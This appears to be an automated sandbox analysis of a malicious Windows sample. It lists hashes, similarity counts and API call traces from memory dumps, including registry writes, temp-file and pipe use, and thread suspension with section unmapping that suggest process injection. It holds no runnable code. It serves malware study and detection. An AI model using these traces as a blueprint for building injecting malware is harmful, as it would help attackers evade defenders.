  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
